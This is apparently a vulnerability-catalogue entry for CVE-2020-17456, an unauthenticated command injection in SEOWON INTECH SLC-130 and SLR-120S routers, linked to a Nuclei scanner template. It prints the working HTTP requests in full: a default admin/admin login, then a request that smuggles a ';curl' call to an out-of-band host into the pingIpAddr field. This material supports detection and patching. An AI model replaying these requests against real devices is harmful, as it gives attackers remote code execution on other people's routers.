| Title | SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution |
|---|---|
| Author | gy741,edoardottt |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. |
| Remediation | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.9004 |
| CVE ID | CVE-2020-17456 |
| CWE ID | CWE-78 |
| Tags | cve cve2020 seowon oast packetstorm rce router unauth iot seowonintech vkev vuln |
SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.
POST /cgi-bin/login.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
Origin: http://www.victim.com
Referer: http://www.victim.com
Accept-Encoding: gzip
browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin
POST /cgi-bin/system_log.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 282
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//d5jokkple0o0lt65eg90k5uekb4uo9gmj.oast.live+-H+'User-Agent%3a+WWcObw'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-17456.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-17456.pcap
N/AN/A